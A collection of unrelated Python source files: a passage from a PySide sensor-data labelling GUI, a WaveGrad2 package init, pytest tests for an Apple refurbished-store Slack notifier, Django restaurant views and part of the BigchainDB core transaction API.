f"{{\nborder:none;\npadding: 3px;\nbackground-color:rgb({light.red()},{light.green()},{light.blue()});"
f"\ntext-align: left;\ncolor:rgb({dark.red()},{dark.green()},{dark.blue()});\n"
f"border-radius: 0px;}}\n\n" # to remove shadow around button
f"QPushButton:hover{{\n background-color: rgb("
f"{even_lighter.red()},{even_lighter.green()},{even_lighter.blue()});\n}}"
f"QPushButton:disabled{{\n"
f"color: rgb(120,120,120)}}"
f"QPushButton:checked{{\n background-color: rgb("
f"{even_lighter.red()},{even_lighter.green()},{even_lighter.blue()});\n}}"
)
self._enable_buttons(False)
def on_main_buttons_clicked(self, new_state):
button = self.sender()
if new_state is False:
self.plot_state.mode = "investigate"
return
self.plot_state.mode = button.objectName()
def _update_button_state(self, new_mode: MODES):
for k, b in self.label_buttons.items():
if not b.isEnabled():
return
old_state = b.blockSignals(True)
b.setChecked(k == new_mode)
b.blockSignals(old_state)
def _unlink_plots(self):
for plot in [*self.sensor_plots, self.ui.video_plot]:
plot.set_coupled_plot(None)
def _save_sync(self):
sync = pd.DataFrame()
main_plot = self._get_main_plot()
if getattr(Config.settings, "SENSORS_SYNCHRONIZED", False):
for plot in self.sensor_plots.values():
if plot == main_plot:
continue
plot.sync_info = main_plot.sync_info
self._link_plots()
for plot_name, plot in self.sensor_plots.items():
sync = pd.concat([sync, pd.DataFrame(data=plot.sync_info, columns=[plot_name])], axis=1)
sync = pd.concat([sync, pd.DataFrame(data=self.video_plot.sync_info, columns=["Video"])], axis=1)
self.VideoWindow.set_sync(self.video_plot.sync_info["start"], self.video_plot.sync_info["end"])
# in case the desired file name was specified in plot data, store sync data automatically
plot_data_key = list(self.global_data.plot_data.keys())[0]
additional_data = self.global_data.plot_data[plot_data_key].additional_data
data_specifier = True if "data_specifier" in additional_data else False
if data_specifier:
# automatically build sync file name
file_name = str(Path(self.global_data.video_file).parent) + os.sep + "{}_sync".format(
additional_data["data_specifier"])
file_ending = ".xlsx"
else:
file_name, file_ending = QFileDialog.getSaveFileName(self, "Save Synchronization File", filter=".xlsx")
if file_name is None:
return
sync.to_excel(file_name + file_ending)
UserInformation().inform("Sync file was stored under {}".format(file_name + file_ending))
for plot in self.sensor_plots.values():
plot.adapt_to_opening_video_window()
def _handle_load_data_gui_format(self):
if self.is_data_plotted():
answer = UserInformation().confirm("Plotted data might be overwritten. Do you want to continue?")
else:
answer = QMessageBox.Yes
if answer == QMessageBox.Yes:
file = self._ask_for_file_name(file_type="*.mad_gui")
self.load_data_from_pickle(file)
def _ask_for_file_name(self, file_type=None):
data_file = QFileDialog().getOpenFileName(
parent=None, caption="Select file to open", dir=str(self.global_data.base_dir), filter=file_type
)[0]
if data_file == "":
# User clicked cancel
return None
self.global_data.data_file = data_file
return data_file
def _set_data_types(self, types: Dict):
"""Saves which of [sensor data, activity labels, stride labels] the user wants to load/save."""
self.data_types = types
def _parse_labels_to_load(self, plot_data: Dict):
label_classes_to_load = []
for sensor_item in plot_data.values():
if "annotations" in sensor_item.keys():
label_classes_to_load.extend(sensor_item["annotations"].keys())
loadable_labels = []
unknown_labels = []
labels_and_events = (*self.global_data.labels, *self.global_data.events)
known_label_types = {label.name: label for label in labels_and_events}
for label_class in label_classes_to_load:
if label_class in known_label_types.keys():
loadable_labels.append(label_class)
else:
unknown_labels.append(label_class)
if len(unknown_labels) > 0:
UserInformation.inform(
f"The saved data has labels which this GUI does not know.\n\n"
f"Unknown label class: {unknown_labels}\n"
)
warnings.warn("Implement link to help.")
return loadable_labels
def load_data_from_pickle(self, file: str):
"""Load data from a .mad_gui file.
Parameters
----------
file
Full path to to a file that ends with `.mad_gui`. This file was previously created using
:func:`~mad_gui.MainWindow.save_data_gui_format` and contains sensor data, activity labels and stride
labels.
However, the user might previously have selected that not all of those should be loaded.
Which parts should be loaded is stored in `self.data_types`.
"""
if file is None:
# user clicked abort
return None, None
if file.split(".")[-1] != "mad_gui":
UserInformation.inform("Can only load files that end with '.mad_gui'.")
return None, None
self.setCursor(Qt.BusyCursor)
loaded_data = pd.read_pickle(file)
loadable_labels = self._parse_labels_to_load(loaded_data)
# Doing it in two lines, and exposing via self to enable testing this whole method
self.data_selector = DataSelector(parent=self, labels=set(loadable_labels))
self.data_selector.ask_user()
if not self.data_types["sensor_data"] and not self.global_data.plot_data:
UserInformation.inform(
"Can only plot labels if data is plotted. Please also tick 'Sensor data' or "
"load sensor data using the 'Load Data' button on the upper left."
)
self.setCursor(Qt.ArrowCursor)
return None, None
selected_data = [data_type for data_type, use in self.data_types.items() if use]
plot_data = {}
for plot_name, data in loaded_data.items():
plot_data[plot_name] = PlotData(parent=self).from_dict(data, selections=selected_data)
self.global_data.plot_data = plot_data
self.global_data.base_dir = Path(file).parent
# self._plot_data()
self.setCursor(Qt.ArrowCursor)
self._enable_buttons(True)
# self.menu.set_collapsed(True)
return loaded_data, loadable_labels
def _label_classes_backwards_compatibility(self, labels, known_label_types: Dict):
class StrideLabel(BaseRegionLabel):
name = "Stride Label"
min_height = 0.25
max_height = 0.75
class ActivityLabel(BaseRegionLabel):
name = "Activity Label"
min_height = 0.75
max_height = 1
for label_class in [StrideLabel, ActivityLabel]:
if label_class.__name__ in labels:
known_label_types[label_class.__name__] = label_class
if label_class.__name__ not in [label.__name__ for label in self.global_data.labels]:
self.global_data.labels = (*self.global_data.labels, label_class)
return known_label_types
def import_data(self):
"""Start dialog to import data.
This will open a :class:`mad_gui.LoadDataWindow`. In there, the user can select data to be loaded:
- sensor data
- annotations
- video
Additionally, the user can select the system that was used to record the sensor data and annotations.
Depending on this selection, the path of the data to be loaded will be passed to the regarding importer in
:mod:`mad_gui.plugins`.
"""
loaders = filter_plugins(self.global_data.plugins, BaseImporter)
if len(loaders) == 0:
UserInformation.inform(
"There were no loaders passed to the GUI. Read more about the fact why the plugin you created does "
"not show up in the GUI by clicking the link below.",
help_link="https://mad-gui.readthedocs.io/en/latest/troubleshooting.html#the-plugin-i-created-does-not-"
"show-up-in-the-GUI",
)
return
view = LoadDataDialog(self.global_data.base_dir, loaders=loaders, parent=self)
data, loader = view.get_data()
if data is None:
return
self.global_data.active_loader = loader
self.global_data.data_file = data.get("data_file_name", "")
self.global_data.sync_file = data.get("sync_file", "")
self.global_data.video_file = data.get("video_file", "")
self._parse_labels_to_load(data["plot_data_dicts"])
try:
plot_data = {k: PlotData().from_dict(v) for k, v in data["plot_data_dicts"].items()}
except Exception as e: # noqa
raise NotImplementedError(
f"Possibly there is an error in the data that was loaded using {loader}. Please "
f"see our guide in implementing an importer: https://mad-gui.readthedocs.io/en/la"
f"test/customization.html#implement-an-importer"
) from e
self.global_data.plot_data = plot_data
self.load_video(data.get("video_file", None))
self._set_sync(data.get("sync_file", None))
self._enable_buttons(True)
# self.menu.set_collapsed(True)
def _set_sync(self, sync_file: str):
"""Set the synchronization for each plot"""
if not sync_file:
return
sync = self.global_data.active_loader._get_video_signal_synchronization(sync_file)
unsynced_sensors = []
for plot_name, plot in self.sensor_plots.items():
try:
plot.sync_info = sync[plot_name]
plot.adapt_to_opening_video_window()
except KeyError:
unsynced_sensors.append(plot_name)
if len(unsynced_sensors) > 1:
UserInformation.inform(
f"Found a synchronization file ({sync_file}), however there is no info about "
f"the sensor(s) {unsynced_sensors}, therefore it is not synchronized."
)
if self.video_plot:
self.video_plot.sync_info = sync["Video"]
if self.VideoWindow:
self.VideoWindow.set_sync(start_frame=sync["Video"]["start"], end_frame=sync["Video"]["end"])
def _plot_data(self, data_dict: Dict[str, PlotData], start_time=None):
# if len(StateKeeper.loaded_data) == 3:
# start_time = StateKeeper.loaded_data[2]
# else:
# TODO: Implement start time
# start_time = None
set_cursor(self, Qt.BusyCursor)
# Delete all existing plots
plot_wrapper: QVBoxLayout = self.ui.plotwidget
for i_plot in list(self.sensor_plots.values()):
plot_wrapper.removeWidget(i_plot)
i_plot.deleteLater()
del i_plot
self.sensor_plots = {}
# Create new plots
for sensor_name, data in data_dict.items():
start_time = data.additional_data.get("start_time") # defaults to None if start_time is not set
plot = SensorPlot(
plot_data=data,
initial_plot_channels=getattr(Config.settings, "CHANNELS_TO_PLOT", None),
start_time=start_time,
label_classes=self.global_data.labels,
event_classes=self.global_data.events,
parent=self,
)
plot_wrapper.addWidget(plot)
self.sensor_plots[sensor_name] = plot
plot.set_title(sensor_name)
# Bind global mode change
self.plot_state.bind_property_bidirectional(plot.state, "mode", "mode", initial="set")
plots = list(self.sensor_plots.values())
plots[0].is_main_plot = True
if getattr(Config.settings, "SENSORS_SYNCHRONIZED", False):
# Bind the ranges of all plots together
self._link_plots()
# TODO: if self.plot_state.mode changes from sync to something else, we want to bind the plots again
set_cursor(self, Qt.ArrowCursor)
def _link_plots(self):
for p in self.sensor_plots.values():
if p.is_main_plot:
continue
self._get_main_plot().set_coupled_plot(p)
def load_video(self, video_path):
if not video_path:
return
if not os.path.exists(video_path):
UserInformation.inform(f"The selected file could not be found: {video_path}")
return
self.VideoWindow.start_video(video_path)
self.VideoWindow.show()
StateKeeper.video_duration_available.connect(self._initialize_video_plot)
self.ui.btn_sync_data.setDisabled(False)
def _initialize_video_plot(self):
StateKeeper.video_duration_available.disconnect(self._initialize_video_plot)
if self.video_plot:
self.ui.plotwidget.removeWidget(self.video_plot)
self.video_plot = VideoPlot(parent=self, video_window=self.VideoWindow)
self.video_plot.set_title("Video Plot")
self.video_plot.hide()
self.ui.plotwidget.addWidget(self.video_plot)
self.plot_state.bind_property_bidirectional(self.video_plot.state, "mode", "mode", initial="set")
self.video_plot.sync_info = self.VideoWindow.sync_info
def _get_main_plot(self):
return [plot for plot in self.sensor_plots.values() if plot.is_main_plot][0]
def use_algorithm(self):
"""Applies an algorithm to the plotted IMU data.
This will basically call :func:`mad_gui.plugins.BaseImporter.annotation_from_data`. Instead of the
`BaseImporter` a different importer specified in the :class:`mad_gui.LoadDataWindow` (dropdown menu)
might be used.
The activity and/or stride labels that will be generated by that method will then be passed to the plots,
which will subsequently plot the labels, see :func:`mad_gui.plot_tools.SensorPlot.set_activity_labels` and
:func:`mad_gui.plot_tools.SensorPlot._set_stride_labels`.
"""
if not self.is_data_plotted():
UserInformation(parent=self).inform("Please load sensor data before continuing.")
return
# if not UserInformation(parent=self).confirm(
# "Warning: Calculating new annotations might delete all currently "
# "displayed annotations!\nIt is up to the implemented algorithm, "
# "if the new annotations are added or if they replace the currently displayed "
# "annotations. Do you want to continue?"
# ):
# return
# Set state to investigate to force updating global state from plot
self.plot_state.mode = "investigate"
algorithms = filter_plugins(self.global_data.plugins, BaseAlgorithm)
if len(algorithms) == 0:
UserInformation.inform(
"There were no algorithms passed to the GUI. Read more about the fact why the plugin you created does "
"not show up in the GUI by clicking the link below.",
help_link="https://mad-gui.readthedocs.io/en/latest/troubleshooting.html#the-plugin-i-created-does-not-"
"show-up-in-the-gui",
)
return
set_cursor(self, Qt.BusyCursor)
dialog = PluginSelectionDialog(plugins=algorithms, parent=self)
try:
dialog.process_data(self.global_data.plot_data)
except Exception as error: # noqa
print(sys.exc_info()[0])
raise NotImplementedError(
"Possibly there is an error in the implementation of the algorithm. Please "
"see our guide in implementing an algorithm: https://mad-gui.readthedocs.io/en/latest/customization.ht"
"ml#implement-an-algorithm"
) from error
self.global_data.plot_data = dialog._data
set_cursor(self, Qt.ArrowCursor)
# actually this should be called automatically due to global_data.bind(_plot_data, "plot_data") but that does
# not work currently
# we could probably resolve it in mad_gui.plot_tools.plots.SensorPlot in the __init__ but it does not work yet
self._plot_data(self.global_data.plot_data)
def _save_data(self, data_to_save: PlotData):
save_file_name = QFileDialog().getSaveFileName(
None, "Save GUI data", str(Path(self.global_data.data_file).parent) + "/data.mad_gui", "*.mad_gui"
)[0]
if save_file_name != "":
pickable_data = {k: v.to_dict() for k, v in data_to_save.items()}
with open(save_file_name, "wb") as file:
pickle.dump(pickable_data, file, protocol=pickle.HIGHEST_PROTOCOL)
def save_data_gui_format(self):
"""Saves the displayed sensor data, sampling rate and displayed activity and stride labels into a pickle file.
The file ending will be `.mad_gui` to make clear it can be loaded again by this GUI. The data can be
re-loaded into the GUI using the `Load Data GUI format` button.
If you want to load this data in an other application / script you can so by using :func:`pandas.read_pickle()`.
"""
if not self.is_data_plotted():
UserInformation.inform("Please load data before continuing.")
return
# Set state to investigate to force updating global state from plot
self.plot_state.mode = "investigate"
self._save_data(self.global_data.plot_data)
StateKeeper.set_has_unsaved_changes(False)
def export(self):
"""Called when clicking the `Export data` button.
This button should be used to calculate features from the annotations. For example to calculate a
mean length of certain activities or strides. To do so, it a :class:`mad_gui.ExportResultsWindow`,
which basically just is used to select one of the exporters in :mod:`mad_gui.plugins`."""
if not self.is_data_plotted():
UserInformation(parent=self).inform("Please to load data before continuing.")
return
# Set state to investigate to force updating global state from plot
self.plot_state.mode = "investigate"
PluginSelectionDialog(plugins=filter_plugins(self.global_data.plugins, BaseExporter), parent=self).process_data(
self.global_data
)
def _close_event(self, ev):
if StateKeeper.gui_has_unsaved_changes:
answer = UserInformation().confirm("Recent changes have not been saved. Are you sure you want to exit?")
if answer == QMessageBox.No:
ev.ignore()
return
if self.VideoWindow:
self.VideoWindow.close()
self.close()
def _set_window_properties(self):
self.setAttribute(Qt.WA_DeleteOnClose)
self.setAttribute(Qt.WA_WindowPropagation)
self.setWindowTitle("MaD GUI")
|
from .WaveGrad2 import WaveGrad2
from .loss import WaveGrad2Loss
from .optimizer import ScheduledOptim |
"""
@file
@brief Ressource for backend
`lightbox2 <https://github.com/lokesh/lightbox2>`_ for directive *image*.
"""
|
import decimal
from refurbished.parser import Product
from app.adapters import apple, slack
from app.domain import commands, model
from app.services import messagebus
def test_available_products(
mocker,
messagebus: messagebus.MessageBus,
refurbished_adapter: apple.RefurbishedStoreAdapter,
slack_adapter: slack.SlackAdapter,
):
mocker.patch.object(refurbished_adapter, "search")
refurbished_adapter.search.side_effect = [[
Product(
name='iPad Wi-Fi + Cellular 32GB ricondizionato',
url='https://www.apple.com/it/ipad-wifi-32gb',
price=decimal.Decimal('419.00'),
previous_price=decimal.Decimal('489.00'),
savings_price=decimal.Decimal('70.00')
),
Product(
name='iPad Wi-Fi + Cellular 128GB ricondizionato',
url='https://www.apple.com/it/ipad-wifi-cellular-128gb',
price=decimal.Decimal('499.00'),
previous_price=decimal.Decimal('0.00'),
savings_price=decimal.Decimal('0.00')
)]]
mocker.patch.object(slack_adapter, 'post_message')
slack_adapter.post_message.side_effect = [None]
cmd = commands.CheckRefurbished(store='it', products=['ipad'])
messagebus.handle(cmd, {})
message = {
'text': """
Found 2 ipad(s):
- <https://www.apple.com/it/ipad-wifi-32gb|iPad Wi-Fi + Cellular 32GB ricondizionato> at ~489.00~ *419.00* (-70.00)
- <https://www.apple.com/it/ipad-wifi-cellular-128gb|iPad Wi-Fi + Cellular 128GB ricondizionato> at *499.00*
"""
}
slack_adapter.post_message.assert_called_once_with(
message, {}
)
def test_unavailable_products(
mocker,
messagebus: messagebus.MessageBus,
refurbished_adapter: apple.RefurbishedStoreAdapter,
slack_adapter: slack.SlackAdapter,
):
mocker.patch.object(refurbished_adapter, "search")
refurbished_adapter.search.side_effect = [[]]
mocker.patch.object(slack_adapter, 'post_message')
slack_adapter.post_message.side_effect = [None]
cmd = commands.CheckRefurbished(store='it', products=['ipad'])
messagebus.handle(cmd, {})
message = {
'text': "Hey, can't find any 'ipad' in the 'it' store now 🤔"
}
slack_adapter.post_message.assert_called_once_with(
message, {}
)
|
import random
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models import Q
from django.shortcuts import render,get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.views import View
from django.views.generic import TemplateView, ListView,DetailView,CreateView, UpdateView
from .models import RestaurantLocation
from .forms import RestaurantCreateForm,RestaurantLocationCreateForm
class RestaurantListView(LoginRequiredMixin,ListView):
def get_queryset(self):
return RestaurantLocation.objects.filter(owner=self.request.user)
class RestaurantDetailView(LoginRequiredMixin,DetailView):
def get_queryset(self):
return RestaurantLocation.objects.filter(owner=self.request.user)
class RestaurantCreateView(LoginRequiredMixin,CreateView):
form_class=RestaurantLocationCreateForm
template_name='form.html'
def form_valid(self,form):
instance = form.save(commit=False)
instance.owner= self.request.user #anonymoususer when not an authenticated user
return super(RestaurantCreateView,self).form_valid(form)
def get_context_data(self,*args,**kwargs):
context = super(RestaurantCreateView,self).get_context_data(*args, **kwargs)
context['title']='Add Restaurant'
return context
class RestaurantUpdateView(LoginRequiredMixin,UpdateView):
form_class=RestaurantLocationCreateForm
template_name='restaurants/detail-update.html'
def get_context_data(self,*args,**kwargs):
context = super(RestaurantUpdateView,self).get_context_data(*args, **kwargs)
context['title']='Update Restaurant'
return context
def get_queryset(self):
return RestaurantLocation.objects.filter(owner=self.request.user) |
import random
import math
import collections
from time import time
from itertools import compress
from bigchaindb.common import crypto, exceptions
from bigchaindb.common.util import gen_timestamp, serialize
from bigchaindb.common.transaction import TransactionLink, Metadata
import rethinkdb as r
import bigchaindb
from bigchaindb.db.utils import Connection
from bigchaindb import config_utils, util
from bigchaindb.consensus import BaseConsensusRules
from bigchaindb.models import Block, Transaction
class Bigchain(object):
"""Bigchain API
Create, read, sign, write transactions to the database
"""
# return if a block has been voted invalid
BLOCK_INVALID = 'invalid'
# return if a block is valid, or tx is in valid block
BLOCK_VALID = TX_VALID = 'valid'
# return if block is undecided, or tx is in undecided block
BLOCK_UNDECIDED = TX_UNDECIDED = 'undecided'
# return if transaction is in backlog
TX_IN_BACKLOG = 'backlog'
def __init__(self, host=None, port=None, dbname=None,
public_key=None, private_key=None, keyring=[],
backlog_reassign_delay=None):
"""Initialize the Bigchain instance
A Bigchain instance has several configuration parameters (e.g. host).
If a parameter value is passed as an argument to the Bigchain
__init__ method, then that is the value it will have.
Otherwise, the parameter value will come from an environment variable.
If that environment variable isn't set, then the value
will come from the local configuration file. And if that variable
isn't in the local configuration file, then the parameter will have
its default value (defined in bigchaindb.__init__).
Args:
host (str): hostname where RethinkDB is running.
port (int): port in which RethinkDB is running (usually 28015).
dbname (str): the name of the database to connect to (usually bigchain).
public_key (str): the base58 encoded public key for the ED25519 curve.
private_key (str): the base58 encoded private key for the ED25519 curve.
keyring (list[str]): list of base58 encoded public keys of the federation nodes.
"""
config_utils.autoconfigure()
self.host = host or bigchaindb.config['database']['host']
self.port = port or bigchaindb.config['database']['port']
self.dbname = dbname or bigchaindb.config['database']['name']
self.me = public_key or bigchaindb.config['keypair']['public']
self.me_private = private_key or bigchaindb.config['keypair']['private']
self.nodes_except_me = keyring or bigchaindb.config['keyring']
self.backlog_reassign_delay = backlog_reassign_delay or bigchaindb.config['backlog_reassign_delay']
self.consensus = BaseConsensusRules
# change RethinkDB read mode to majority. This ensures consistency in query results
self.read_mode = 'majority'
if not self.me or not self.me_private:
raise exceptions.KeypairNotFoundException()
self.connection = Connection(host=self.host, port=self.port, db=self.dbname)
def reconnect(self):
return r.connect(host=self.host, port=self.port, db=self.dbname)
def write_transaction(self, signed_transaction, durability='soft'):
"""Write the transaction to bigchain.
When first writing a transaction to the bigchain the transaction will be kept in a backlog until
it has been validated by the nodes of the federation.
Args:
signed_transaction (Transaction): transaction with the `signature` included.
Returns:
dict: database response
"""
signed_transaction = signed_transaction.to_dict()
# we will assign this transaction to `one` node. This way we make sure that there are no duplicate
# transactions on the bigchain
if self.nodes_except_me:
assignee = random.choice(self.nodes_except_me)
else:
# I am the only node
assignee = self.me
signed_transaction.update({'assignee': assignee})
signed_transaction.update({'assignment_timestamp': time()})
# write to the backlog
response = self.connection.run(
r.table('backlog')
.insert(signed_transaction, durability=durability))
return response
def reassign_transaction(self, transaction, durability='hard'):
"""Assign a transaction to a new node
Args:
transaction (dict): assigned transaction
Returns:
dict: database response or None if no reassignment is possible
"""
if self.nodes_except_me:
try:
federation_nodes = self.nodes_except_me + [self.me]
index_current_assignee = federation_nodes.index(transaction['assignee'])
new_assignee = random.choice(federation_nodes[:index_current_assignee] +
federation_nodes[index_current_assignee + 1:])
except ValueError:
# current assignee not in federation
new_assignee = random.choice(self.nodes_except_me)
else:
# There is no other node to assign to
new_assignee = self.me
response = self.connection.run(
r.table('backlog')
.get(transaction['id'])
.update({'assignee': new_assignee, 'assignment_timestamp': time()},
durability=durability))
return response
def get_stale_transactions(self):
"""Get a RethinkDB cursor of stale transactions
Transactions are considered stale if they have been assigned a node, but are still in the
backlog after some amount of time specified in the configuration
"""
return self.connection.run(
r.table('backlog')
.filter(lambda tx: time() - tx['assignment_timestamp'] > self.backlog_reassign_delay))
def validate_transaction(self, transaction):
"""Validate a transaction.
Args:
transaction (Transaction): transaction to validate.
Returns:
The transaction if the transaction is valid else it raises an
exception describing the reason why the transaction is invalid.
"""
return self.consensus.validate_transaction(self, transaction)
def is_valid_transaction(self, transaction):
"""Check whether a transaction is valid or invalid.
Similar to :meth:`~bigchaindb.Bigchain.validate_transaction`
but never raises an exception. It returns :obj:`False` if
the transaction is invalid.
Args:
transaction (:Class:`~bigchaindb.models.Transaction`): transaction
to check.
Returns:
The :class:`~bigchaindb.models.Transaction` instance if valid,
otherwise :obj:`False`.
"""
try:
return self.validate_transaction(transaction)
except (ValueError, exceptions.OperationError, exceptions.TransactionDoesNotExist,
exceptions.TransactionOwnerError, exceptions.DoubleSpend,
exceptions.InvalidHash, exceptions.InvalidSignature,
exceptions.FulfillmentNotInValidBlock):
return False
def get_transaction(self, txid, include_status=False):
"""Retrieve a transaction with `txid` from bigchain.
Queries the bigchain for a transaction, if it's in a valid or invalid
block.
Args:
txid (str): transaction id of the transaction to query
include_status (bool): also return the status of the transaction
the return value is then a tuple: (tx, status)
Returns:
A :class:`~.models.Transaction` instance if the transaction
was found, otherwise ``None``.
If :attr:`include_status` is ``True``, also returns the
transaction's status if the transaction was found.
"""
response, tx_status = None, None
validity = self.get_blocks_status_containing_tx(txid)
if validity:
# Disregard invalid blocks, and return if there are no valid or undecided blocks
validity = {_id: status for _id, status in validity.items()
if status != Bigchain.BLOCK_INVALID}
if validity:
tx_status = self.TX_UNDECIDED
# If the transaction is in a valid or any undecided block, return it. Does not check
# if transactions in undecided blocks are consistent, but selects the valid block before
# undecided ones
for target_block_id in validity:
if validity[target_block_id] == Bigchain.BLOCK_VALID:
tx_status = self.TX_VALID
break
# Query the transaction in the target block and return
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.get(target_block_id)
.get_field('block')
.get_field('transactions')
.filter(lambda tx: tx['id'] == txid))[0]
else:
# Otherwise, check the backlog
response = self.connection.run(r.table('backlog')
.get(txid)
.without('assignee', 'assignment_timestamp')
.default(None))
if response:
tx_status = self.TX_IN_BACKLOG
if response:
response = Transaction.from_dict(response)
if include_status:
return response, tx_status
else:
return response
def get_status(self, txid):
"""Retrieve the status of a transaction with `txid` from bigchain.
Args:
txid (str): transaction id of the transaction to query
Returns:
(string): transaction status ('valid', 'undecided',
or 'backlog'). If no transaction with that `txid` was found it
returns `None`
"""
_, status = self.get_transaction(txid, include_status=True)
return status
def search_block_election_on_index(self, value, index):
"""Retrieve block election information given a secondary index and value
Args:
value: a value to search (e.g. transaction id string, payload hash string)
index (str): name of a secondary index, e.g. 'transaction_id'
Returns:
:obj:`list` of :obj:`dict`: A list of blocks with with only election information
"""
# First, get information on all blocks which contain this transaction
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.get_all(value, index=index)
.pluck('votes', 'id', {'block': ['voters']}))
return list(response)
def get_blocks_status_containing_tx(self, txid):
"""Retrieve block ids and statuses related to a transaction
Transactions may occur in multiple blocks, but no more than one valid block.
Args:
txid (str): transaction id of the transaction to query
Returns:
A dict of blocks containing the transaction,
e.g. {block_id_1: 'valid', block_id_2: 'invalid' ...}, or None
"""
# First, get information on all blocks which contain this transaction
blocks = self.search_block_election_on_index(txid, 'transaction_id')
if blocks:
# Determine the election status of each block
validity = {
block['id']: self.block_election_status(
block['id'],
block['block']['voters']
) for block in blocks
}
# NOTE: If there are multiple valid blocks with this transaction,
# something has gone wrong
if list(validity.values()).count(Bigchain.BLOCK_VALID) > 1:
block_ids = str([block for block in validity
if validity[block] == Bigchain.BLOCK_VALID])
raise exceptions.DoubleSpend('Transaction {tx} is present in '
'multiple valid blocks: '
'{block_ids}'
.format(tx=txid,
block_ids=block_ids))
return validity
else:
return None
def get_tx_by_metadata_id(self, metadata_id):
"""Retrieves transactions related to a metadata.
When creating a transaction one of the optional arguments is the `metadata`. The metadata is a generic
dict that contains extra information that can be appended to the transaction.
To make it easy to query the bigchain for that particular metadata we create a UUID for the metadata and
store it with the transaction.
Args:
metadata_id (str): the id for this particular metadata.
Returns:
A list of transactions containing that metadata. If no transaction exists with that metadata it
returns an empty list `[]`
"""
cursor = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.get_all(metadata_id, index='metadata_id')
.concat_map(lambda block: block['block']['transactions'])
.filter(lambda transaction: transaction['transaction']['metadata']['id'] == metadata_id))
transactions = list(cursor)
return [Transaction.from_dict(tx) for tx in transactions]
def get_txs_by_asset_id(self, asset_id):
"""Retrieves transactions related to a particular asset.
A digital asset in bigchaindb is identified by an uuid. This allows us to query all the transactions
related to a particular digital asset, knowing the id.
Args:
asset_id (str): the id for this particular metadata.
Returns:
A list of transactions containing related to the asset. If no transaction exists for that asset it
returns an empty list `[]`
"""
cursor = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.get_all(asset_id, index='asset_id')
.concat_map(lambda block: block['block']['transactions'])
.filter(lambda transaction: transaction['transaction']['asset']['id'] == asset_id))
return [Transaction.from_dict(tx) for tx in cursor]
def get_spent(self, txid, cid):
"""Check if a `txid` was already used as an input.
A transaction can be used as an input for another transaction. Bigchain needs to make sure that a
given `txid` is only used once.
Args:
txid (str): The id of the transaction
cid (num): the index of the condition in the respective transaction
Returns:
The transaction (Transaction) that used the `txid` as an input else
`None`
"""
# checks if an input was already spent
# checks if the bigchain has any transaction with input {'txid': ..., 'cid': ...}
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.concat_map(lambda doc: doc['block']['transactions'])
.filter(lambda transaction: transaction['transaction']['fulfillments']
.contains(lambda fulfillment: fulfillment['input'] == {'txid': txid, 'cid': cid})))
transactions = list(response)
# a transaction_id should have been spent at most one time
if transactions:
# determine if these valid transactions appear in more than one valid block
num_valid_transactions = 0
for transaction in transactions:
# ignore invalid blocks
# FIXME: Isn't there a faster solution than doing I/O again?
if self.get_transaction(transaction['id']):
num_valid_transactions += 1
if num_valid_transactions > 1:
raise exceptions.DoubleSpend('`{}` was spent more then once. There is a problem with the chain'.format(
txid))
if num_valid_transactions:
return Transaction.from_dict(transactions[0])
else:
# all queried transactions were invalid
return None
else:
return None
def get_owned_ids(self, owner):
"""Retrieve a list of `txid`s that can be used as inputs.
Args:
owner (str): base58 encoded public key.
Returns:
:obj:`list` of TransactionLink: list of `txid`s and `cid`s
pointing to another transaction's condition
"""
# get all transactions in which owner is in the `owners_after` list
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.concat_map(lambda doc: doc['block']['transactions'])
.filter(lambda tx: tx['transaction']['conditions']
.contains(lambda c: c['owners_after']
.contains(owner))))
owned = []
for tx in response:
# disregard transactions from invalid blocks
validity = self.get_blocks_status_containing_tx(tx['id'])
if Bigchain.BLOCK_VALID not in validity.values():
if Bigchain.BLOCK_UNDECIDED not in validity.values():
continue
# NOTE: It's OK to not serialize the transaction here, as we do not
# use it after the execution of this function.
# a transaction can contain multiple outputs (conditions) so we need to iterate over all of them
# to get a list of outputs available to spend
for index, cond in enumerate(tx['transaction']['conditions']):
# for simple signature conditions there are no subfulfillments
# check if the owner is in the condition `owners_after`
if len(cond['owners_after']) == 1:
if cond['condition']['details']['public_key'] == owner:
tx_link = TransactionLink(tx['id'], index)
else:
# for transactions with multiple `owners_after` there will be several subfulfillments nested
# in the condition. We need to iterate the subfulfillments to make sure there is a
# subfulfillment for `owner`
if util.condition_details_has_owner(cond['condition']['details'], owner):
tx_link = TransactionLink(tx['id'], index)
# check if input was already spent
if not self.get_spent(tx_link.txid, tx_link.cid):
owned.append(tx_link)
return owned
def create_block(self, validated_transactions):
"""Creates a block given a list of `validated_transactions`.
Note that this method does not validate the transactions. Transactions
should be validated before calling create_block.
Args:
validated_transactions (list(Transaction)): list of validated
transactions.
Returns:
Block: created block.
"""
# Prevent the creation of empty blocks
if len(validated_transactions) == 0:
raise exceptions.OperationError('Empty block creation is not '
'allowed')
voters = self.nodes_except_me + [self.me]
block = Block(validated_transactions, self.me, gen_timestamp(), voters)
block = block.sign(self.me_private)
return block
# TODO: check that the votings structure is correctly constructed
def validate_block(self, block):
"""Validate a block.
Args:
block (Block): block to validate.
Returns:
The block if the block is valid else it raises and exception
describing the reason why the block is invalid.
"""
return self.consensus.validate_block(self, block)
def has_previous_vote(self, block_id, voters):
"""Check for previous votes from this node
Args:
block_id (str): the id of the block to check
voters (list(str)): the voters of the block to check
Returns:
bool: :const:`True` if this block already has a
valid vote from this node, :const:`False` otherwise.
Raises:
ImproperVoteError: If there is already a vote,
but the vote is invalid.
"""
votes = list(self.connection.run(
r.table('votes', read_mode=self.read_mode)
.get_all([block_id, self.me], index='block_and_voter')))
if len(votes) > 1:
raise exceptions.MultipleVotesError('Block {block_id} has {n_votes} votes from public key {me}'
.format(block_id=block_id, n_votes=str(len(votes)), me=self.me))
has_previous_vote = False
if votes:
if util.verify_vote_signature(voters, votes[0]):
has_previous_vote = True
else:
raise exceptions.ImproperVoteError('Block {block_id} already has an incorrectly signed vote '
'from public key {me}'.format(block_id=block_id, me=self.me))
return has_previous_vote
def write_block(self, block, durability='soft'):
"""Write a block to bigchain.
Args:
block (Block): block to write to bigchain.
"""
self.connection.run(
r.table('bigchain')
